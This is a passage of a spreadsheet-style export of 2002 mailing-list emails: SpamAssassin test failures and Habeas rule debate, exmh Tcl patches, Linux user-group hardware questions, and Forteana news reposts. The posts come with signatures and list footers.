    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0088_01C24EA2.FC21D7A0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit Justin Mason wrote: &gt; OK guys -- I reckon it's now Good Enough, modulo some minor score &gt; tweaking, or commenting of some more broken/high-FP-ing rules. &gt; &gt; What do you all think?  are we ready to go?  anyone run into any trouble &gt; with the new autoconf code, or found a bug from the merge of that spamc &gt; BSMTP-support patch? I just checked out b2_4_0 from CVS and 'make test' fails horribly. It seems to be looking in my site_perl SpamAssassin code, not the build directory. Example error: Failed to run FROM_AND_TO_SAME_5 SpamAssassin test, skipping:         (Can't locate object method "check_for_from_to_same" via package "Mail::SpamAssassin::PerMsgStatus" at /usr/local/lib/perl5/site_perl/5.8.0/Mail/SpamAssassin/PerMsgStatus.pm line 1701. ) Anyone else seeing this? rOD. -- "If you're dumb, surround yourself with smart people;  and if you're smart, surround yourself with smart people  who disagree with you." Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt; ------=_NextPart_000_0088_01C24EA2.FC21D7A0 Content-Type: application/x-pkcs7-signature; 	name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; 	filename="smime.p7s" MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJIjCCAnow ggHjoAMCAQICARcwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxHDAaBgNVBAoTE0VxdWlm YXggU2VjdXJlIEluYy4xJjAkBgNVBAMTHUVxdWlmYXggU2VjdXJlIGVCdXNpbmVzcyBDQS0xMB4X DTAyMDQxODE1MjkzN1oXDTIwMDQxMzE1MjkzN1owTjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUdl b1RydXN0IEluYy4xJzAlBgNVBAMTHkdlb1RydXN0IFRydWUgQ3JlZGVudGlhbHMgQ0EgMjCBnzAN BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAspcspZISpYX/aJqWoYcSyyGqFby3OvsepRzLRU0ENDJR wJo7DwFpirRFOUQkTkKXsY6BQzX/CeCRrn9i4ny5gcXuI2JSyrSmDwobbwl52n5cPEbHGcebybWd KfAf8vvkxYUnTmDZPtt2ob5RNpJTeTiq9MpNCB/5G7Ocr1hEljcCAwEAAaNjMGEwDgYDVR0PAQH/ BAQDAgHGMB0GA1UdDgQWBBQig0tNIAIMMfR8WrAaTRXIeF0RSTAPBgNVHRMBAf8EBTADAQH/MB8G A1UdIwQYMBaAFEp4MlIR21kWNl7fwRQ2QGpHfEyhMA0GCSqGSIb3DQEBBQUAA4GBACmw3z+sLsLS fAfdECQJPfiZFzJzSPQKLwY7vHnNWH2lAKYECbtAFHBpdyhSPkrj3KghXeIJnKyMFjsK6xd1k1Yu wMXrauUH+HIDuZUg4okBwQbhBTqjjEdo/cCHILQsaLeU2kM+n5KKrpb0uvrHrocGffRMrWhz9zYB lxoq0/EEMIICgjCCAeugAwIBAgIBBDANBgkqhkiG9w0BAQQFADBTMQswCQYDVQQGEwJVUzEcMBoG A1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1c2lu ZXNzIENBLTEwHhcNOTkwNjIxMDQwMDAwWhcNMjAwNjIxMDQwMDAwWjBTMQswCQYDVQQGEwJVUzEc MBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1 c2luZXNzIENBLTEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4vGbwXt3fek6lfWg0XTzQa DJj0ItlZ1MRoRvC0NcWFAyDGr0WlIVFFQesWWDYyb+JQYmT5/VGcqiTZ9J2DKocKIdMSODRsjQBu WqDZQu4aIZX5UkxVWsUPOE9G+m34LjXWHXzr4vCwdYDIqROsvojvOm6rXyo4YgKwEnv+j6YDAgMB AAGjZjBkMBEGCWCGSAGG+EIBAQQEAwIABzAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFEp4 MlIR21kWNl7fwRQ2QGpHfEyhMB0GA1UdDgQWBBRKeDJSEdtZFjZe38EUNkBqR3xMoTANBgkqhkiG 9w0BAQQFAAOBgQB1W6ibAxHm6VZMzfmpTMANmvPMZWnmJXbMWbfWVMMdzZmsGd20hdXgPfxiIKeE S1hl8eL5lSE/9dR+WB5Hh1Q+WKG1tfgq73HnvMP2sUlG4tega+VWeponmHxGYhTnyfxuAxJ5gDgd SIKN/Bf+KpYrtWKmpj29f5JZzVoqgrI3eTCCBBowggODoAMCAQICAxAAdTANBgkqhkiG9w0BAQQF ADBOMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEnMCUGA1UEAxMeR2VvVHJ1 c3QgVHJ1ZSBDcmVkZW50aWFscyBDQSAyMB4XDTAyMDgwNzE3MzA1NloXDTAzMDgyMTE3MzA1Nlow ggHQMQswCQYDVQQGEwJVUzFJMEcGA1UEChNAR2VvVHJ1c3QgVHJ1ZSBDcmVkZW50aWFscyBDdXN0 b21lciAtIE9yZ2FuaXphdGlvbiBub3QgdmFsaWRhdGVkLjE/MD0GA1UECxM2Q1BTIHRlcm1zIGlu Y29ycG9yYXRlZCBieSByZWZlcmVuY2UgbGlhYmlsaXR5IGxpbWl0ZWQuMUkwRwYDVQQLE0BTZWUg VHJ1ZSBDcmVkZW50aWFscyBFeHByZXNzIENQUyB3d3cuZ2VvdHJ1c3QuY29tL3Jlc291cmNlcy9D UFMuMS0wKwYDVQQLEyRFbWFpbCBjb250cm9sIHZhbGlkYXRlZCBieSBHZW9UcnVzdC4xPzA9BgNV BAsTNklkZW50aXR5IGF1dGhlbnRpY2F0ZWQgYnkgUmVnaXN0cmF0aW9uIEF1dGhvcml0eSAoUkEp LjFCMEAGA1UECxQ5UmVnaXN0cmF0aW9uIEF1dGhvcml0eSAoUkEpIC0gcm9kLWdlb3RydXN0QGFy c2VjYW5kbGUub3JnMRMwEQYDVQQDEwpyT0QgQmVnYmllMSEwHwYJKoZIhvcNAQkBFhJyT0RAYXJz ZWNhbmRsZS5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMXm5uxWzmnY4QqgZrm7Y0Hp CRnHrXk8zcYCYwTO4Jsh3wdeUEzzAXLuU+kkGduVA8QXWWNb61zlXwNhVMAuazPlLTmdce6GSFVO zCOYViHcuXnF4gj6ptYXTYReKrIznwYW50r7iKRrnsAeVqMMo9D9oM9bS+ySFcQhIBZZl+0lAgMB AAGjgYEwfzARBglghkgBhvhCAQEEBAMCBaAwDgYDVR0PAQH/BAQDAgXgMDkGA1UdHwQyMDAwLqAs oCqGKGh0dHA6Ly9jcmwuZ2VvdHJ1c3QuY29tL2NybHMvZ3R0Y2NhMi5jcmwwHwYDVR0jBBgwFoAU IoNLTSACDDH0fFqwGk0VyHhdEUkwDQYJKoZIhvcNAQEEBQADgYEAeZyTyjFzabynSLBSiQTLxPgp 0YoEvrYnCGdioATy99A0TpmWwR+h6hO2iJPTersqPg4iUJrK5douLHjwrjmJCscFRACsQXuOh+wG oilcCkXEMbqx+ShedO+rthR41RM/l06T45p1lgLJQyYPjy9jpzf8XY0K8GXPK/rtt323fOYxggG4 MIIBtAIBATBVME4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMScwJQYDVQQD Ex5HZW9UcnVzdCBUcnVlIENyZWRlbnRpYWxzIENBIDICAxAAdTAJBgUrDgMCGgUAoIG6MBgGCSqG SIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAyMDgyODE4NTU0M1owIwYJKoZI hvcNAQkEMRYEFNak2UdcsftBLpLOYcXm92WzUklRMFsGCSqGSIb3DQEJDzFOMEwwCgYIKoZIhvcN AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEo MAcGBSsOAwIdMA0GCSqGSIb3DQEBAQUABIGAIDfmdXpwHOS7ho3C1cjFGuaNQ3AJde7lsx5t93sS 7wp8Cdu/OO0o9v+9ogALhzyFNn+z3NPmOud2Sl1ycqV35ZBqzjUPZGdlLYyN2KYyDl/F6yZ3WoQ/ ZGNRR4NLUQxOsNGd5/M+SfD4uLcFRWwut6br/uadzUsSUkDy55MqyvMAAAAAAAA= ------=_NextPart_000_0088_01C24EA2.FC21D7A0-- ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.groovymother.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Axel Thimm &lt;Axel.Thimm@physik.fu-berlin.de&gt;\nDate: Wed, 28 Aug 2002 14:32:35 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:32:35 +0200</t>
  </si>
  <si>
    <t>/home/dude</t>
  </si>
  <si>
    <t>Hi, some time now the following messages were haunting me:      automount[11593]: attempting to mount entry /home/dude It just came to my attention, that only freshrpm benefitting hosts showed this up. I grepped through the binaries and found referrences to /home/dude. # grep /home/dude /usr/bin/* Binary file /usr/bin/aaxine matches Binary file /usr/bin/gentoo matches Binary file /usr/bin/gphoto2 matches Binary file /usr/bin/gtkam matches ... I am now relaxed again ;), and pass this info on. Probably Matthias Saou himself is "dude", and some package has hardwired a path in his build directory. It would be nice to find out which and fix it, but I am using too many of the freshrpm suite to narrow it down. Regards, Axel. --  Axel.Thimm@physik.fu-berlin.de _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Michael Moncur" &lt;mgm@starlingtech.com&gt;\nDate: Wed, 28 Aug 2002 14:28:16 -0600</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:28:16 -0600</t>
  </si>
  <si>
    <t>"Michael Moncur" &lt;mgm@starlingtech.com&gt;</t>
  </si>
  <si>
    <t>&gt; I may be dense, but why would anyone want to utilize Habeus?  To\n&gt; me, it looks like a potential backdoor to anyone's defenses against spam.\n\nYou're not dense. I'm going to zero the habeas scores on my copy of\nSpamAssassin. I think they were added to SA quite prematurely. To me it's\nsimple:\n\n1. People who send me legitimate email have absolutely no motivation to use\nHabeas, at least until it gets lots more press, and even then only\nbulk-mailing companies like Amazon or eBay are going to bother, and I\nalready whitelist them. Individuals won't bother.\n\n2. Spammers have lots of motivation to forge the Habeas headers, and a good\npercentage of them are completely out of the legal reach of Habeas.\n\nI think it should be subjected to the same testing and scrutiny as any other\npotential new rule. When I test against my corpus here's what I get:\n\nOVERALL     SPAM  NONSPAM     S/O   SCORE  NAME\n  13851     8919     4932    0.64    0.00  (all messages)\n      0        0        0    0.00   -1.00  HABEAS_SWE\n\nThe score of -1.0 is pretty harmless right now, but it still looks like a\nuseless rule so far.\n\n--\nMichael Moncur  mgm at starlingtech.com  [URL]http://www.starlingtech.com[/URL]\n"Never interrupt your enemy when he is making a mistake." --Napoleon\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http://www.starlingtech.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 28 Aug 2002 14:25:47 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:25:47 -0500</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>--==_Exmh_1089505257P Content-Type: text/plain; charset=us-ascii &gt; From:  Brent Welch  &gt; Date:  Wed, 28 Aug 2002 10:32:42 -0700 &gt; &gt;  &gt; &gt;&gt;&gt;Robert Elz said: &gt;  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the &gt;  &gt; context file) but I'm not sure how frequently that one is called. &gt;  &gt; In some places I maintain caches of files by checking their modify time, &gt; but the sequence files are soo small that by the time you stat them to &gt; check their date stamp, you could just read them again. Do you really think this is true?  I added a modify time check thinking that  it would make an improvement since we were reading it a *lot* more times in  the new code because we're trying to use the sequences. On the other hand, the sequences files are probably being read out of cache  when that happens anyway. Even with a small file, I'd think that the time taken to do a  [file mtime $filename] would be worth it.  My code is in proc MhReadSeqs. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_1089505257P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9bSO7K9b4h5R0IUIRArNLAKCEDkKX52y2P9sdtrcPsgTEmGZhBgCfe2QY VNJN/s+r1/dmpUA2v+Gihc4= =wxvL -----END PGP SIGNATURE----- --==_Exmh_1089505257P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.DeepEddy.Com http://www.virCIO.Com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Stewart Smith &lt;Stewart.Smith@ee.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 14:14:45 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:14:45 +0100</t>
  </si>
  <si>
    <t>Stewart Smith &lt;Stewart.Smith@ee.ed.ac.uk&gt;</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Re: That wacky imam</t>
  </si>
  <si>
    <t>Martin Adamson wrote:&gt;&gt;And we know how unbiased MEMRI is, don't we....\n&gt;&gt;\n&gt; \n&gt; Oh, of course, you're right, any information not coming from a source that \n&gt; fits your pre-conceived world view can simply be dismissed out of hand.\n&gt; \n&gt; Martin\n&gt; \n\nFor goddess' sake Martin that seems to be exactly what you're doing.  You \nstarted your reply to Tim's posting of the Guardian article by suggesting that \nit was factually inaccurate.  Did you actually read it or did you just assume \nthat if the Grauniad writes about a Muslim extremist they must be making him out \nas an all round nice guy?\n\nStewart\n-- \nStewart Smith\nScottish Microelectronics Centre, University of Edinburgh.\n[URL]http://www.ee.ed.ac.uk[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.ee.ed.ac.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "ILUG" &lt;ilug@linux.ie&gt;\nFrom: "Kiall Mac Innes" &lt;kiall@redpie.com&gt;\nDate: Wed, 28 Aug 2002 14:09:48 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:09:48 +0100</t>
  </si>
  <si>
    <t>"Kiall Mac Innes" &lt;kiall@redpie.com&gt;</t>
  </si>
  <si>
    <t>"ILUG" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Modem Problems</t>
  </si>
  <si>
    <t>ive just gotton myself a modem (no its not a winmodem, yes im sure) it dials\nthe internet grant using the RedHat PPP Dialer... and i can ping the server\ni dial into but i cant get any furthur than that server? any ideas?\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 13:55:54 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:55:54 +0100</t>
  </si>
  <si>
    <t>"Tim Chapman" &lt;timc@2ubh.com&gt;</t>
  </si>
  <si>
    <t>zzzzteana &lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Worryingly sophisticated bees</t>
  </si>
  <si>
    <t>Ananova: \nBrazilian bees keep their own 'insect ranch'\n\nScientists have found a new species of bee that behaves like a farmer by\nkeeping herds of insects.\nThe Amazonian Schwarzula use their own 'insect ranches' to provide food and\nbuilding materials.\nThe bees nest in holes in trees alongside 200 aphid-like insects from a\nspecies called cryptostigma.\nCryptostigma feed on tree sap and excrete a sugar solution, which the bees\nstop them from drowning in, by licking it up and turning it into honey.\nThe insects also produce wax from glands on their backs, which the bees\nscrape off and use for their nest.\nNature reports it is the first time farming behaviour has been discovered in\nbees.\nBiologist Joao Camargo, of the University of Sao Paulo in Brazil, said: "In\nturn the bees provide the insects with sanitary benefits and protection."\nWriting in the journal Biotropica, Camargo says the bees might even carry\ntheir insect ranches around the forest with them and is planning further\nresearch on how they tend to their herd.\nStudies of the Schwarzula showed the bees seemed to get most of their sugar\nfrom the insect farms. Some bees were seen licking human sweat for salt.\nStory filed: 13:49 Wednesday 28th August 2002\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSuper Blue Stuff Pain Relief - On Sale Today for $29.95 + shipping!\nWith Super Blue Stuff youll feel the results in just minutes.\nRelieves arthritis pain, back pain, sore muscles, and more!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Andy &lt;andy@r2-dvd.org&gt;\nDate: Wed, 28 Aug 2002 13:54:36 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:54:36 +0100</t>
  </si>
  <si>
    <t>Andy &lt;andy@r2-dvd.org&gt;</t>
  </si>
  <si>
    <t>"'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Betamax finally laid to rest</t>
  </si>
  <si>
    <t>Not fortean, but a moment in time all the same...\n\n[URL]http://news.bbc.co.uk[/URL]\n\n\nBetamax video recorders are finally being phased out almost 20 years after\nlosing the battle for dominance of the home video market to VHS. \nBetamax's manufacturer, Sony, has announced that it will make only 2,000\nmore machines for the Japanese market. \n\nThey have not been on sale in the rest of the world since 1998. \n\n \nVHS became the dominant format by the mid-1980s\n \nBetamax was launched in 1975, and won many fans who said it was better\nquality than its VHS rival. \n\nSome 2.3 million Betamax machines were sold worldwide in its peak year,\n1984, but it soon went downhill as VHS became the format of choice for the\nfilm rental industry and in homes. \n\nJust 2,800 machines were sold in the 12 months to March 2002. \n\n"With digital machines and other new recording formats taking hold in the\nmarket, demand has continued to decline and it has become difficult to\nsecure parts," Sony said in a statement. \n\nSony said it would continue to offer repairs and manufacture tapes for the\nformat. \n\nThe professional Betamax format, Betacam, is still widely used in the\ntelevision and film industries and will be unaffected. \n\nBut the recent rise of DVDs seems to have put the final nail in the coffin\nfor Betamax home players. \n\nIn the 1980s, many video rental chains preferred the VHS format. \n\nBetamax lovers became so passionate about the format in the face of\ncompetition from VHS that they set up the Betaphile Club in 1988. \n\nThe picture and sound quality of Beta was superior to VHS, Betaphiles say,\nalthough VHS tapes had a longer duration. \n\nA total of 18 million Betamax machines were sold around the world, but no\nnew ones will be made after the end of 2002. \n\nSony is now planning to focus its efforts on new digital technologies. \n  See also:\n\n\n \n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nKwick Pick Portable Lock Pick - Opens Almost Any Lock!\nLocked out? Try the Kwick Pick. For $17.95, you can open car doors,\ndesk drawers, padlocks, and much more! Never get locked out again!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "HAMILTON,DAVID (HP-Ireland,ex2)" &lt;david_hamilton3@hp.com&gt;\nDate: Wed, 28 Aug 2002 13:52:32 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:52:32 +0100</t>
  </si>
  <si>
    <t>"HAMILTON,DAVID (HP-Ireland,ex2)" &lt;david_hamilton3@hp.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] Hayes Accura ISDN PCI</t>
  </si>
  <si>
    <t>Does anyone know if this is supported under 2.4.18 kernels or higher?\n\nI need to buy an ISDN TA quick, and PC World have these in stock for 65.\n\nThanks,\n	David.\n\nDavid Hamilton\nSenior Technical Consultant\nHP Ireland \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 28 Aug 2002 13:51:21 +0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:51:21 +0700</t>
  </si>
  <si>
    <t>I have some patches that seem to fix/avoid this problem now.   (It is amazing what one can achieve when mains power fails, long enough for UPS's to run out, and all that is left operational is the laptop and its battery supply...) First, I put in some defensive code into the area where the problem was occurring, so that if exmh is attempting (for any reason) to expand a sequence that isn't either a number, or a range of numbers (or a list of such things) it will simply ignore the trash, rather than giving a traceback. This one solves the initial problem: --- mh.tcl.WAS	Thu Aug 22 21:15:06 2002 +++ mh.tcl	Wed Aug 28 12:39:11 2002 @@ -487,6 +487,10 @@      set seq {}      set rseq {}      foreach range [split [string trim $sequence]] { +	if ![regexp {^[0-9]+(-[0-9]+)?$} $range] { +	    # just ignore anything bogus +	    continue; +	}  	set parts [split [string trim $range] -]  	if {[llength $parts] == 1} {  	    lappend seq $parts That is amending proc MhSeqExpand which is where the error was occurring before (the code assumes that $range is either NNN or NNN-MMM so we should probably make sure that's true - issue an error instead of just "continue" if you like, but I don't think an error is needed). But that just allowed me to create a similar problem, in another place, by typing "NNN-" ... and rather than continue to fight fires like this, I thought I should think more about Brent's suggestion.   But rather than have the selection code actually validate the input, which would mean it would have to know what is to be valid, I decided that the right thing to do is just to ignore any errors caused by invalid input, so I just stuck a "catch" around the MsgShow that is processing the nonsense that the user has typed. This way, any later expansion to what MsgShow treats as legal (maybe allowing a sequence name, like "prev" or "next", or anything else can be handled just there, without someone needing to remember that they have to go fix the selection processing code to allow it. But, while I was playing there, I noticed something I never new before. If you type "66+" the "66" changes to "67" (and so on, for each + that is typed).   I suspect that's perhaps an artifact of "+ is bound to a different function so it can be used as a toggle between changing the current and the target folder, but it has to mean something if the current input mode is a message number, so let it mean...", but now I found it, I think its nice.    But if we can type 66+ why not 66- as well?  That kind of limitation bugs me, so I fixed it. And then I wondered about folders with names containing '+' - the special use of + as the toggle character means there's no way to type those from the keyboard.   So I fixed that as well.   This makes two different restrictions - there's no way to type a folder name that has a name beginning with '+' (but such a thing in MH would be a pain to use anyway, so I doubt this will bother anyone), and it is now only possible to toggle between typing the current &amp; target folder name when the name being typed is empty.   I'm less happy about that part, but I think I can live with it in order to allow folder names with +'s in them to exist and be typed. Then, since I was there anyway, I decided to do something about another feature that has always bugged me.   In "normal" keyboard mode, 's' is the key used to show a message.    But if you've just typed 123, and the FTOC is highlighting 123 as the current message, and you want to now show that message, you can't type 's', you have to type \r instead. So I "fixed" this one as well.   "Fixed" here is in quotes, as it assumes that the keybinding for MsgShow is 's', if you change that to something else, it will remain 's' in here.   I don't know enough tk/tcl to have it discover what key is bound to a function in the external world in order to bind the same one here.   \r continues to work of course. And now I got started in fixing irritants in this code, I also made it clear the status line if you abort message/folder entry mode (^C or ^G). Previously it used to leave the prompt sitting there until the next message appeared, which made it less than obvious that the keyboard had reverted to its usual bindings. In any case, what follows is the patch that does all of that.   I believe that if you apply this, then the one above is probably not needed, the "catch" around the "MsgShow" will hide the problem (I don't think we really need to fix Brent's way of invoking it).   Or include it anyway, just for completeness (I haven't run an exmh with the following patch, but not the previous one, so I don't know for sure that all will be OK then). kre --- select.tcl.WAS	Thu Aug 22 21:15:07 2002 +++ select.tcl	Wed Aug 28 13:36:17 2002 @@ -49,9 +49,11 @@      bindtags $w [list $w Entry]      bind $w 	{SelectTypein %W %A}      bind $w 	{SelectToggle %W } +    bind $w 	{SelectPrev %W }      bind $w 	{SelectComplete %W}      bind $w 	{SelectComplete %W}      bind $w 	{SelectReturn %W} +    bind $w 	{SelectReturn %W %A}      bind $w 	{SelectBackSpace %W}      bind $w 	{SelectBackSpace %W}      bind $w 	{SelectBackSpace %W} @@ -72,7 +74,7 @@      append select(sel) $a      Exmh_Status "$select(prompt) $select(sel)"      if ![info exists select(folder)] { -	Msg_Change $select(sel) noshow +	catch { Msg_Change $select(sel) noshow }      }  }  proc SelectBackSpace { w } { @@ -91,6 +93,10 @@  proc SelectToggle {w} {      global select      if [info exists select(folder)] { +	if {$select(sel) != ""} { +	    SelectTypein $w + +	    return +	}  	set select(toggle) [list [lindex $select(toggle) 1] [lindex $select(toggle) 0]]  	set select(prompt) "[lindex $select(toggle) 0] Folder:"      } else { @@ -101,6 +107,18 @@      }      Exmh_Status "$select(prompt) $select(sel)"  } +proc SelectPrev {w} { +    global select +    if [info exists select(folder)] { +	SelectTypein $w "-" +    } else { +	catch { +	    incr select(sel) -1 +	    Msg_Change $select(sel) noshow +	} +        Exmh_Status "$select(prompt) $select(sel)" +    } +}  proc SelectComplete { w } {      global select      if [info exists select(folder)] { @@ -126,9 +144,13 @@  	Exmh_Status "$select(prompt) $select(sel)"      }  } -proc SelectReturn { w } { +proc SelectReturn { w {a {}} } {      global select      if [info exists select(folder)] { +	if {$a != {}} { +	    SelectTypein $w $a +	    return +	}  	if [info exists select(match)] {  	    set select(sel) $select(match)  	    unset select(match) @@ -151,6 +173,7 @@  	unset select(folder)      }      $select(entry) configure -state disabled +    Exmh_Status ""      Exmh_Focus  }  proc SelectClear { w } { _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Andy &lt;andy@r2-dvd.org&gt;\nDate: Wed, 28 Aug 2002 13:50:58 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 13:50:58 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] US Army tests portable translator</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\nUS soldiers on peacekeeping duties in the future could find that a portable\ntranslation device will be an essential part of their equipment. \nScientists at Carnegie Mellon University have developed a prototype of a\nspeech translator that was road-tested by US Army chaplains in Croatia. \n\n"This project shows how a relatively simple speech-to-speech translation\nsystem can be rapidly and successfully constructed using today's tools,"\nsaid the team from Carnegie Mellon University in a research paper published\nrecently. \n\nThe research was commissioned by the US Army, which is increasingly finding\nitself in peace-keeping roles where communication is key. \n\nSpeaking in tongues \n\n"In the Balkans, the Army is not just supposed to conquer somebody," Robert\nFrederking of Carnegie Mellon University told the BBC programme Go Digital. \n\n \nTranslators could be essential for US soldiers\n \n"In a peacekeeping situation, you have two guys trying to beat each other up\nand you are holding them apart. \n\n"You can't just shot one of them, you have to figure what is going on and\ntalk to them," he said. \n\nThe portable translator was developed with a year, using commercially\navailable laptops. \n\nThe Army did not want to field-test the device in a battlefield situation.\nSo instead the translator was tested by US Army chaplains in Croatia. \n\n"The chaplains very often end up having to talk to foreign nationals and\ntypically don't have any translation support," explained Mr Frederking. \n\nSlow system \n\nFor the trials, the chaplains used the translator to speak to Croatians who\nknew just a smattering of English. \n\nThe system works by having a speech recogniser that picks up the words in\nCroatian, turns the speech into text. The written words are then translated\ninto English and read out by a speech synthesizer. \n\n"It went reasonably well half the time," said Mr Frederking, though it was\nslow in translating phrases. \n\nThe research team admit that the system is not ready to be deployed in the\nfield. \n\nBut they say their trials showed that a portable translator could be made to\nwork with further research and development. \n\nThe Audio Voice Translation Guide System project was a joint venture between\nthe US Army, the military manufacturer Lockheed Martin and Carnegie Mellon\nUniversity. \n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nReceive Phone Calls and Faxes While You're Online!\nEmerson Switchboard eliminates the need for a second phone line.\nOrder the Switchboard today for $39.95 + shipping and handling.\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
